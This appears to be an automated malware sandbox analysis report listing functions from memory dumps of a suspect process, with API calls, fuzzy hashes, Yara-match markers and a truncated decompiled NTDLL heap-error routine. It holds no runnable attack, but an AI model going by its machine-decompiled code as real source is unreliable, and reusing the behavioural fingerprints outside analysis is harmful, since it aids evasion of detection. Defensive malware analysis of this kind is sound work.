Function 04639840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0463984A

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 61cb937b1c077e84023b1aa30c5400d3100c44a4adb5eee7bc1ffa6c5112e8b3
Instruction ID: b7e284f5f58df551704898a6e90347f4d8db04f560d58e9daea3d10a760a95e4
Opcode Fuzzy Hash: 61cb937b1c077e84023b1aa30c5400d3100c44a4adb5eee7bc1ffa6c5112e8b3
Instruction Fuzzy Hash: D49002A1742041527A45B5594405507400AA7E0285791C012A1405990C9566E856E661

Uniqueness

Uniqueness Score: -1.00%

Function 04639540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0463954A

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 87f0ea223b043f6bf0fcc01a405178e2bcf4e6ed6619c43324991c42d13c190a
Instruction ID: 249a5928b9b2ec2340ef252ac3d1a01228c01e4dbc6ad2f346d75f01fb5a9da1
Opcode Fuzzy Hash: 87f0ea223b043f6bf0fcc01a405178e2bcf4e6ed6619c43324991c42d13c190a
Instruction Fuzzy Hash: 139002A5711000032605A9590705507004A97D5395351C021F1006590CE661D8616161

Uniqueness

Uniqueness Score: -1.00%

Function 04639910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0463991A

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ee648af45a51809e395730f4c1d4e23b1c37fea286b7f35655af273b005b0d9
Instruction ID: 04eea924cb120ce635319b60212751f48d9465b0a7474a52b2e6306049240402
Opcode Fuzzy Hash: 2ee648af45a51809e395730f4c1d4e23b1c37fea286b7f35655af273b005b0d9
Instruction Fuzzy Hash: E29002F170100402F64075594405746000997D0345F51C011A5055594E9699DDD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 046395D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046395DA

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eed0262de7394bd1c93da71f8f84852e57a014e73d4021933a3f6c335494bd40
Instruction ID: 0b77c58bc05f76b21cf8471bcc05912c7129c15f52ad05b59f8aaf3d1b34f65f
Opcode Fuzzy Hash: eed0262de7394bd1c93da71f8f84852e57a014e73d4021933a3f6c335494bd40
Instruction Fuzzy Hash: 659002E170200003660575594415616400E97E0245B51C021E10055D0DD565D8917165

Uniqueness

Uniqueness Score: -1.00%

Function 046399A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046399AA

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 63fa94cb96df31647ba146f588b9f430caae4e1f8446466114a4abba255689c8
Instruction ID: 5101fb1144896621cc9810a3196e9afa8af39267e4f1b7e4b1836d7dd1cc8cd3
Opcode Fuzzy Hash: 63fa94cb96df31647ba146f588b9f430caae4e1f8446466114a4abba255689c8
Instruction Fuzzy Hash: 049002E174100442F60065594415B060009D7E1345F51C015E1055594D9659DC527166

Uniqueness

Uniqueness Score: -1.00%

Function 04639660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0463966A

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b2377a2126a006af5b2b4b1c18cc90e3f2d9c49d0f054f1d5fbf9ad6625bd87
Instruction ID: 5ba6e8ae806ac41625e8f89da9115f1b1f118bad0b397c2d0a1e5f2182bd53ad
Opcode Fuzzy Hash: 6b2377a2126a006af5b2b4b1c18cc90e3f2d9c49d0f054f1d5fbf9ad6625bd87
Instruction Fuzzy Hash: 569002B170100802F6807559440564A000997D1345F91C015A0016694DDA55DA5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04639A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04639A5A

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce4c126da09719c0624ad7bec071098b68fcb7b97c36770251c67692237cdb9e
Instruction ID: c39f2e744e540232e3586d839314a97a2899033506d1c5b04c56521599765fbe
Opcode Fuzzy Hash: ce4c126da09719c0624ad7bec071098b68fcb7b97c36770251c67692237cdb9e
Instruction Fuzzy Hash: 4D9002A171180042F70069694C15B07000997D0347F51C115A0145594CD955D8616561

Uniqueness

Uniqueness Score: -1.00%

Function 04639650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0463965A

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dbe123e8ba01de3ca799be72f989405431a7f64c0bb7855e0ca9ebdf69d92391
Instruction ID: 1aa2d29aa82c5eb412d455287353756ee8482fac9933f3e58bad6a3a9e64381f
Opcode Fuzzy Hash: dbe123e8ba01de3ca799be72f989405431a7f64c0bb7855e0ca9ebdf69d92391
Instruction Fuzzy Hash: B59002B170504842F64075594405A46001997D0349F51C011A00556D4DA665DD55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 046396E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046396EA

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f40bd8c6bf2d7bdb6de687d00e0f05fb5bd7d3ace96297f77699685084b49327
Instruction ID: 2bd6d0a34b5e152ce960974f1cc8eb19e33fb7620c59198cd47fe4efd84f07a5
Opcode Fuzzy Hash: f40bd8c6bf2d7bdb6de687d00e0f05fb5bd7d3ace96297f77699685084b49327
Instruction Fuzzy Hash: F19002B170108802F6106559840574A000997D0345F55C411A4415698D96D5D8917161

Uniqueness

Uniqueness Score: -1.00%

Function 046396D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 046396DA

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0ead58b918643a62688ab3c6c6b010b78e8ff7b4abdd622f83c8cfed724e331a
Instruction ID: cd0fab182980d4b010a32219f31382dd8219dc617f6a82a02cfe02a8aad727d4
Opcode Fuzzy Hash: 0ead58b918643a62688ab3c6c6b010b78e8ff7b4abdd622f83c8cfed724e331a
Instruction Fuzzy Hash: 529002B170100842F60065594405B46000997E0345F51C016A0115694D9655D8517561

Uniqueness

Uniqueness Score: -1.00%

Function 04639710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0463971A

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 58e4aeea2e04f548de7904250884440a4f933ac19ca6bf17ebd7ebe4617dbe5e
Instruction ID: 739210852599d014d40bf2b29c701ad9d1fb3686431dc08ab0c2897a1fbcf119
Opcode Fuzzy Hash: 58e4aeea2e04f548de7904250884440a4f933ac19ca6bf17ebd7ebe4617dbe5e
Instruction Fuzzy Hash: 5C9002B170100402F60069995409646000997E0345F51D011A5015595ED6A5D8917171

Uniqueness

Uniqueness Score: -1.00%

Function 04639FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04639FEA

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 980170b5adbf6b4cf9ef8eb2acb89b100440d269d9c2934cba3da037d0b1d05c
Instruction ID: 7454263737fffc305419f42464051dd03975ac979e2c6a69d216bb7a1e44d680
Opcode Fuzzy Hash: 980170b5adbf6b4cf9ef8eb2acb89b100440d269d9c2934cba3da037d0b1d05c
Instruction Fuzzy Hash: 4C9002B171114402F61065598405706000997D1245F51C411A0815598D96D5D8917162

Uniqueness

Uniqueness Score: -1.00%

Function 04639780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0463978A

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4b0f60ef7042343d647a03eb1addcd7894d7deacb1a069a59a1eaed99ae5e52d
Instruction ID: 56a19d4298e61b3da2051a8ec8ff9751a5bdb88cb22e68db97215979d750f76c
Opcode Fuzzy Hash: 4b0f60ef7042343d647a03eb1addcd7894d7deacb1a069a59a1eaed99ae5e52d
Instruction Fuzzy Hash: 069002A971300002F6807559540960A000997D1246F91D415A0006598CD955D8696361

Uniqueness

Uniqueness Score: -1.00%

Function 0069A053, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00683AF8), ref: 0069A08D

Strings

.z`, xrefs: 0069A07C, 0069A088

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: aee304be1e763495225baf6aeeca383a5192bd60409a9ac1ee6247f18238f32a
Instruction ID: 7f06a46986dc9f873d3fc3c99b991b59308153a22e1a826ac947fc9bf11944f8
Opcode Fuzzy Hash: aee304be1e763495225baf6aeeca383a5192bd60409a9ac1ee6247f18238f32a
Instruction Fuzzy Hash: 9CE06DB1600205AFDB18DFA4CC49EAB7BADEF84350F118559F91EE7251C631E900CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0069A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00683AF8), ref: 0069A08D

Strings

.z`, xrefs: 0069A07C, 0069A088

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: a832dde2d9a0d5f9f1827094939dd80b252b2eea1db7bb9784c6ec290937f486
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 27E012B1210208ABDB18EF99CC49EA777ADAF88750F018558BE189B242C630E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 0069A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(006944F6,?,?,oLi,?,006944F6,?,?,?,?,?,00000000,00000000,?), ref: 0069A04D

Strings

oLi, xrefs: 0069A029

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: oLi
API String ID: 1279760036-3563621626
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: c99ea10514d5381e092bffd523acc294c724b575e8e96f2e4475fc52e09d52b3
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 28E012B1210208ABDB14EF99CC41EA777ADAF88650F118558BE189B242C630F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 006882E8, Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0068834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0068836B

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 137b42871d10f162c1df8d40e130507c82990b757c19bb0379ea4c65cc0e923f
Instruction ID: 433bfbe9a7a3b7d0d1015578c58da3d8900b15cc57c09bfbd4fbc6189bcf3a90
Opcode Fuzzy Hash: 137b42871d10f162c1df8d40e130507c82990b757c19bb0379ea4c65cc0e923f
Instruction Fuzzy Hash: 6E01D831A402287BEB20B6A49C03FFE776DAB41B50F04021DFF04BA1C2D7946A0547E5

Uniqueness

Uniqueness Score: -1.00%

Function 006882F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0068834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0068836B

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
Instruction ID: 0d491158cc15d6724151474dc4d5ca3fa5677bce7c72b7ad6f2cd774b722254b
Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
Instruction Fuzzy Hash: 92018431A802287BEB20B6949C03FFE766D6B40F50F044119FF04BA1C2EA94690647EA

Uniqueness

Uniqueness Score: -1.00%

Function 0069A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0069A124

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 91d3fa01bccef17d368f687810124fe1f399f72fadf433e92cf67268b19915f0
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 2D01AFB2210108AFCB54DF89DC81EEB77ADAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0069A0CD, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0069A124

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 7a42ef1b716b9addf90618d128aa7a083db978a25c4d18127f1c92e4c6d65a33
Instruction ID: f6e7070850a2f6d16e3c13830940fad608754acc98a49dbe1b4e78dd25234165
Opcode Fuzzy Hash: 7a42ef1b716b9addf90618d128aa7a083db978a25c4d18127f1c92e4c6d65a33
Instruction Fuzzy Hash: 8C01AFB2210108AFCB54DF89DC81EEB77ADAF8C354F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0069A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0068F192,0068F192,?,00000000,?,?), ref: 0069A1F0

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 5bceb161acb6b377d103481033e261675cd1365cadaa29d19f1524c3a0521062
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: A0E01AB12002086BDB10DF89CC85EE737ADAF89650F018154BE0C57241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0069A1F5, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0068F192,0068F192,?,00000000,?,?), ref: 0069A1F0

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 9024d83459725e260e797f309a2dcf6f37e0fdab2d56d2de45c42527941d7771
Instruction ID: 0915ffb1ede75f1262685ef52cf042981c0c8d59e82bb93844ca0cf84f800c82
Opcode Fuzzy Hash: 9024d83459725e260e797f309a2dcf6f37e0fdab2d56d2de45c42527941d7771
Instruction Fuzzy Hash: 6BD0C2B01042402BCB00DF58EC40CA7376DEFC12647008546FC0C83201C130C81086F1

Uniqueness

Uniqueness Score: -1.00%

Function 0068F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00688CF4,?), ref: 0068F6BB

Memory Dump Source

Source File: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: 2648836b85ceca38940ec8dbaff244477efcf827e6e236536cef0bcb98688dfc
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: 39D0A7727903043BEA10FBA49C03F6632CD6B44B04F490474F948DB3C3ED50E4014165

Uniqueness

Uniqueness Score: -1.00%

Function 0463967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04639694

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ffd6a4378d7959133d662e722307935e15340dacccdacd5721f509492cd40a7
Instruction ID: adc1e3f4a424fadb37a9d9c305a0c8423334f28f39f45310fff6399003b997ba
Opcode Fuzzy Hash: 3ffd6a4378d7959133d662e722307935e15340dacccdacd5721f509492cd40a7
Instruction Fuzzy Hash: 0EB09BF1E064C5C5FB15DB604608717790477D1745F16C051D1020691A5778D095F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 046AB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 046AB2DC
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 046AB47D
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 046AB3D6
an invalid address, %p, xrefs: 046AB4CF
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 046AB305
*** Inpage error in %ws:%s, xrefs: 046AB418
Go determine why that thread has not released the critical section., xrefs: 046AB3C5
write to, xrefs: 046AB4A6
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 046AB484
*** An Access Violation occurred in %ws:%s, xrefs: 046AB48F
a NULL pointer, xrefs: 046AB4E0
The resource is owned shared by %d threads, xrefs: 046AB37E
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 046AB476
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 046AB38F
*** enter .cxr %p for the context, xrefs: 046AB50D
*** then kb to get the faulting stack, xrefs: 046AB51C
The critical section is owned by thread %p., xrefs: 046AB3B9
*** A stack buffer overrun occurred in %ws:%s, xrefs: 046AB2F3
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 046AB323
read from, xrefs: 046AB4AD, 046AB4B2
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 046AB39B
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 046AB53F
*** enter .exr %p for the exception record, xrefs: 046AB4F1
<unknown>, xrefs: 046AB27E, 046AB2D1, 046AB350, 046AB399, 046AB417, 046AB48E
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 046AB314
This failed because of error %Ix., xrefs: 046AB446
The resource is owned exclusively by thread %p, xrefs: 046AB374
The instruction at %p referenced memory at %p., xrefs: 046AB432
*** Resource timeout (%p) in %ws:%s, xrefs: 046AB352
The instruction at %p tried to %s , xrefs: 046AB4B6

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 263bb4cf38953d2fa3a63dacb964cc1598d18a1116a8e4a85b9236454d29b2cc
Instruction ID: f975a1d568eab2ff15b28c6fbe2917b785f48abc9690a836dbc65d0e9004ac0d
Opcode Fuzzy Hash: 263bb4cf38953d2fa3a63dacb964cc1598d18a1116a8e4a85b9236454d29b2cc
Instruction Fuzzy Hash: 1881F575A00610FFEB29AE068C45D7A3B36EF5AB55F004148F2061B211F361B861EF75

Uniqueness

Uniqueness Score: -1.00%

Function 046B1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E046B1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x45d48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E045FB150();
				} else {
					E045FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x46e589c);
				E045FB150("Heap error detected at %p (heap handle %p)\n",  *0x46e58a0);
				_t27 =  *0x46e5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M046B1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E045FB150();
				} else {
					E045FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E045FB150("Error code: %d - %s\n",  *0x46e5898);
				_t113 =  *0x46e58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E045FB150();
					} else {
						E045FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E045FB150("Parameter1: %p\n",  *0x46e58a4);
				}
				_t115 =  *0x46e58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E045FB150();
					} else {
						E045FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E045FB150("Parameter2: %p\n",  *0x46e58a8);
				}
				_t117 =  *0x46e58ac; // 0x0
				if(_t117 != 0) {
